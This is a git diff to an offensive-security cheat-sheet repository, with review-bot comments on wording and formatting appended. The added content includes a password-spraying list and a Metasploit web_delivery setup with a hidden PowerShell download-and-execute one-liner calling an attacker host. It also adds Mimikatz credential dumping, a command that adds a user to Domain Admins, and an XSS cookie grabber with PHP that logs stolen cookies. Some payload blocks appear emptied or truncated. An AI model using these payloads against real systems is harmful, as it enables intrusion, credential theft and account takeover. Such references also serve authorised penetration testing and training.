diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d878269..7c7e7d5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -570,6 +570,12 @@ root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 ``` +Most of the time the best passwords to spray are : + +- Password1 +- Welcome1 +- $Companyname1 + ## Privilege Escalation @@ -658,3 +664,4 @@ net group "Domain Admins" hacker2 /add /domain * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) +* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 013d5ac..76e6bcd 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md 
@@ -1,5 +1,25 @@ # Metasploit +## Summary + +* [Installation](#installation) +* [Sessions](#sessions) +* [Background handler](#background-handler) +* [Meterpreter - Basic](#meterpreter---basic) + * [Generate a meterpreter](#generate-a-meterpreter) + * [Meterpreter Webdelivery](#meterpreter-webdelivery) + * [Get System](#get-system) + * [Persistence Startup](#persistence-startup) + * [Portforward](#portforward) + * [Upload / Download](#upload---download) + * [Execute from Memory](#execute-from-memory) + * [Mimikatz](#mimikatz) + * [Pass the Hash - PSExec](#pass-the-hash---psexec) +* [Scripting Metasploit](#scripting-metasploit) +* [Multiple transports](#multiple-transports) +* [Best of - Exploits](#best-of---exploits) +* [References](#references) + ## Installation ```powershell @@ -25,7 +45,7 @@ sessions -c cmd -> Execute a command on several sessions sessions -i 10-20 -c "id" -> Execute a command on several sessions ``` -## Multi/handler in background (screen/tmux) +## Background handler ExitOnSession : the handler will not exit if the meterpreter dies. @@ -60,7 +80,25 @@ $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > she $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl ``` -### SYSTEM / Administrator privilege +### Meterpreter Webdelivery + +Set up a Powershell web delivery listening on port 8080. + +```powershell +use exploit/multi/script/web_delivery +set TARGET 2 +set payload windows/x64/meterpreter/reverse_http +set LHOST 10.0.0.1 +set LPORT 4444 +run +``` + +```powershell +powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB'); +``` + + +### Get System ```powershell meterpreter > getsystem @@ -120,6 +158,7 @@ mimikatz_command -f sekurlsa::searchPasswords ```powershell load kiwi +creds_all golden_ticket_create -d -k -s -u -t ``` 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8c751b6..cb2adbc 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -162,6 +162,12 @@ netsh firewall show state netsh firewall show config ``` +List firewall's blocked ports + +```powershell +$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports +``` + List all network shares ```powershell diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index c1034cc..92378f9 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -5,6 +5,7 @@ ```powershell net user hacker hacker /add net localgroup administrators hacker /add +net group "Domain Admins" hacker /ADD /DOMAIN ``` Some info about your user diff --git a/XSS Injection/README.md b/XSS Injection/README.md index c4f9aba..29bc724 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -2,38 +2,82 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. +## Summary + - [Exploit code or POC](#exploit-code-or-poc) + - [Data grabber for XSS](#data-grabber-for-xss) + - [UI redressing](#ui-redressing) + - [Javascript keylogger](#javascript-keylogger) + - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [Blind XSS](#blind-xss) + - [XSS Hunter](#xss-hunter) + - [Other Blind XSS tools](#other-blind-xss-tools) + - [Blind XSS endpoint](#blind-xss-endpoint) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) + - [Bypass case sensitive](#bypass-case-sensitive) + - [Bypass tag blacklist](#bypass-tag-blacklist) + - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) + - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) + - [Bypass quotes for string](#bypass-quotes-for-string) + - [Bypass quotes in script tag](#bypass-quotes-in-script-tag) + - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) + - [Bypass dot filter](#bypass-dot-filter) + - [Bypass parenthesis for string](#bypass-parenthesis-for-string) + - [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist) + - [Bypass space filter](#bypass-space-filter) + - [Bypass email filter](#bypass-email-filter) + - [Bypass document blacklist](#bypass-document-blacklist) + - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) + - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect) + - [Bypass using an alternate way to execute an 
alert](#bypass-using-an-alternate-way-to-execute-an-alert) + - [Bypass ">" using nothing](#bypass----using-nothing) + - [Bypass ";" using another character](#bypass-using------using-another-character) + - [Bypass using HTML encoding](#bypass-using-html-encoding) + - [Bypass using Katana](#bypass-using-katana) + - [Bypass using ECMAScript6](#bypass-using-ecmascript6) + - [Bypass using Octal encoding](#bypass-using-octal-encoding) + - [Bypass using Unicode](#bypass-using-unicode) + - [Bypass using UTF-7](#bypass-using-utf---7) + - [Bypass using UTF-8](#bypass-using-utf---8) + - [Bypass using UTF-16be](#bypass-using-utf---16be) + - [Bypass using UTF-32](#bypass-using-utf---32) + - [Bypass using BOM](#bypass-using-bom) + - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) - [CSP Bypass](#csp-bypass) - [Common WAF Bypass](#common-waf-bypass) ## Exploit code or POC -Cookie grabber for XSS +### Data grabber for XSS + +Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page. + +```html + + + + +``` + +Write the collected data into a file. ```php document.location='http://localhost/XSS/grabber.php?c='+document.cookie -or - - -// Write the cookie in a file $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie.'\r\n'); fclose($fp); - ?> ``` -UI redressing (Sophisticated phishing) +### UI redressing + +Leverage the XSS to modify the HTML content of the page in order to display a fake login form. ```html ``` -Keylogger for XSS +### Javascript keylogger + +Another way to collect sensitive data is to set a javascript keylogger. 
```javascript ``` +### Other ways + More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/) @@ -315,7 +363,7 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu ``` -### Other tools for Blind XSS +### Other Blind XSS tools - [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) - [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) @@ -406,20 +454,20 @@ javascript:`//"//\"//alert(1) ``` -Bypass tag blacklist +### Bypass tag blacklist ```javascript 
@@ -454,77 +504,70 @@ http://localhost/bla.php?test= ``` -Bypass quotes in mousedown event +### Bypass quotes in mousedown event + +You can bypass a single quote with ' in an on mousedown event handler ```javascript Link - -You can bypass a single quote with ' in an on mousedown event handler ``` -Bypass dot filter +### Bypass dot filter ```javascript ``` -Bypass parenthesis for string - Firefox/Opera +### Bypass parenthesis for string ```javascript alert`1` setTimeout`alert\u0028document.domain\u0029`; ``` -Bypass onxxxx= blacklist +### Bypass onxxxx= blacklist ```javascript -``` -Bypass onxxx= filter with a null byte/vertical tab - IE/Safari - -```javascript +// Bypass onxxx= filter with a null byte/vertical tab -``` -Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari - -```javascript +// Bypass onxxx= filter with a '/' ``` -Bypass space filter with "/" - IE/Firefox/Chrome/Safari +### Bypass space filter ```javascript +// Bypass space filter with "/" -``` -Bypass space filter with 0x0c/^L - -```javascript +// Bypass space filter with 0x0c/^L - $ echo "" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c . ``` -Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) +### Bypass email filter + +([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) ```javascript ">"@x.y ``` -Bypass document blacklist +### Bypass document blacklist ```javascript
``` -Bypass using javascript inside a string +### Bypass using javascript inside a string ```javascript "; ``` -Bypass using an alternate way to redirect +### Bypass using an alternate way to redirect ```javascript location="http://google.com" @@ -542,7 +585,9 @@ window.location.assign("http://google.com") window['location']['href']="http://google.com" ``` -Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) +### Bypass using an alternate way to execute an alert + +From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. ```javascript window['alert'](0) @@ -561,7 +606,8 @@ content['alert'](6) [12].forEach(alert); ``` -Bypass using an alternate way to execute an alert - [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) +From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. + ```javascript prompt`${document.domain}` document.location='java\tscript:alert(1)' @@ -569,7 +615,7 @@ document.location='java\rscript:alert(1)' document.location='java\tscript:alert(1)' ``` -Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464) +From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. ```javascript eval('ale'+'rt(0)'); @@ -616,13 +662,15 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) { XSSObject.proxy(window, 'alert', 'window.alert', false); ``` -Bypass ">" using nothing #trololo (you don't need to close your tags) +### Bypass ">" using nothing + +You don't need to close your tags. ```javascript alert`1` ``` -Bypass using Octal encoding +### Bypass using Octal encoding ```javascript javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' ``` -Bypass using Unicode +### Bypass using Unicode ```javascript Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was 
@@ -704,7 +754,13 @@ Bypass using Unicode converted to uppercase <ıframe id=x onload=>.toUpperCase() become \"/\"src=\"/\"onerror=eval(id) -String.fromCharCode(88,83,83) - -
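Review bot: in the `Active Directory Attack.md` hunk at `@@ -570`, "the best passwords to spray are :" has a stray space before the colon and should read "are:". The third list entry, `$Companyname1`, is a pattern rather than a literal value, so say so explicitly (the company name followed by `1`), otherwise it reads like a fixed string alongside `Password1` and `Welcome1`.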
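Review bot: in the `Metasploit - Cheatsheet.md` hunk at `@@ -1`, the Summary link `[Upload / Download](#upload---download)` will not resolve: GitHub drops the `/` and turns the two remaining spaces into hyphens, giving `#upload--download`, whereas the ` - ` headings (`#meterpreter---basic`, `#pass-the-hash---psexec`, `#best-of---exploits`) correctly get three hyphens. Fix that one anchor and check the rest against the rendered headings before merging.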
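Review bot: in the `Metasploit - Cheatsheet.md` hunk at `@@ -60`, the path `rYDPPB` in `IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB')` is the random URI the `web_delivery` module printed for one particular run, not a fixed value; label the second block as sample module output and mark `10.0.0.1`/`4444` as placeholders so the one-liner is not copied verbatim. Also write "PowerShell" rather than "Powershell" in "Set up a Powershell web delivery", and note that the first block is `msfconsole` input even though it is fenced as `powershell`.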
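Review bot: in the `Windows - Privilege Escalation.md` hunk at `@@ -162`, the filter `where {$_.action -eq "0"}` lists every block rule whether or not it is enabled, so disabled rules show up as "blocked ports"; add `-and $_.enabled` to the filter and include `direction` in the `select` (inbound and outbound block rules mean different things), e.g. `where {$_.action -eq 0 -and $_.enabled} | select name,applicationname,direction,localports`. The heading "List firewall's blocked ports" reads better as "List ports blocked by the firewall", and `New-object` should be cased `New-Object` for consistency with the rest of the file.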
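Review bot: in the `Windows - Using credentials.md` hunk at `@@ -5`, the added `net group "Domain Admins" hacker /ADD /DOMAIN` uses upper-case switches next to the lower-case `/add` on the two preceding lines; pick one casing. The line also silently widens the block's scope from local accounts to the domain, so it needs a one-line comment saying that it only succeeds when run as an account already permitted to modify that group, otherwise readers will expect it to work wherever the two `net user`/`net localgroup` lines do.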
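Review bot: in the `XSS Injection/README.md` hunk at `@@ -2`, the Summary entry `(#bypass-unsing-an-alternate-way-to-redirect)` contains a typo ("unsing") and will not match the `### Bypass using an alternate way to redirect` heading added later in this patch. In the same hunk the sentence "Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page." is ungrammatical (suggest "The following payload sends the administrator's cookie or access token to a page the tester controls."), the line `document.location='http://localhost/XSS/grabber.php?c='+document.cookie` is JavaScript but is left inside the ```php fence after the `or` separator was removed, and the existing `fwrite($fp, 'Cookie:' .$cookie.'\r\n');` writes a literal backslash-r backslash-n because PHP single quotes do not interpret escapes; use `"\r\n"`. Also write "JavaScript keylogger" rather than "Javascript keylogger".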
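Review bot: in the `XSS Injection/README.md` hunk at `@@ -454`, converting the old headings into `//` comments dropped the browser applicability they carried: "Firefox/Opera" on the parenthesis bypass, "IE/Safari" on the null byte/vertical tab variant, and "IE/Firefox/Chrome/Safari" on the `/` and space-filter variants. Keep that information in the comment text, since it is what tells a reader which engine a given payload is relevant to. The standalone line `([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))` under "### Bypass email filter" should become a sentence, e.g. "This address is RFC compliant (see ...)", and the `$ echo "" | xxd` transcript sits inside a ```javascript fence where it will be read as code.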
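Review bot: in the `XSS Injection/README.md` hunks at `@@ -542`, `@@ -561` and `@@ -569`, "From [@brutelogic](...) tweet." and its two siblings are missing the possessive; write "From @brutelogic's tweet", "From @quanyang's tweet" and "From @404death's tweet", keeping the links.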
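Review bot: in the `XSS Injection/README.md` hunk at `@@ -616`, the context text "Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN" appears to carry a soft hyphen (U+00AD) where the character name needs an ASCII hyphen ("LESS-THAN SIGN"); since this section is specifically about normalisation of look-alike characters, a stray invisible code point in the explanation is worth cleaning up, and the explanatory prose should sit outside the ```javascript fence rather than inside it.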